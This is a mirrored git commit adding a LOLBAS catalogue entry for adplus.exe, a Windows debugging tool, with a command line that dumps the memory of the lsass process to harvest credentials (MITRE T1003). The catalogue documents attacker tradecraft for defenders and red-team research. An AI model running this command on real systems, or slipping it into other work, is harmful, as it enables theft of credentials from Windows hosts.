mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-26 14:59:03 +01:00
Create Adplus.yml
This commit is contained in:
parent
7dab1b916e
commit
080fe4ca5b
27
yml/OtherMSBinaries/Adplus.yml
Normal file
27
yml/OtherMSBinaries/Adplus.yml
Normal file
@ -0,0 +1,27 @@
|
|||||||
|
---
|
||||||
|
Name: adplus.exe
|
||||||
|
Description: Debugging tool included with Windows Debugging Tools
|
||||||
|
Author: mr.d0x
|
||||||
|
Created: 1/9/2021
|
||||||
|
Commands:
|
||||||
|
- Command: adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet
|
||||||
|
Description: Creates a memory dump of the lsass process
|
||||||
|
Usecase: Create memory dump and parse it offline
|
||||||
|
Category: Credentials
|
||||||
|
Privileges: SYSTEM
|
||||||
|
MitreID: T1003
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1003/
|
||||||
|
OperatingSystem: All Windows
|
||||||
|
Full_Path:
|
||||||
|
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
|
||||||
|
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe
|
||||||
|
Code_Sample:
|
||||||
|
- Code:
|
||||||
|
Detection:
|
||||||
|
- IOC:
|
||||||
|
Resources:
|
||||||
|
- Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: mr.d0x
|
||||||
|
Handle: '@mrd0x'
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user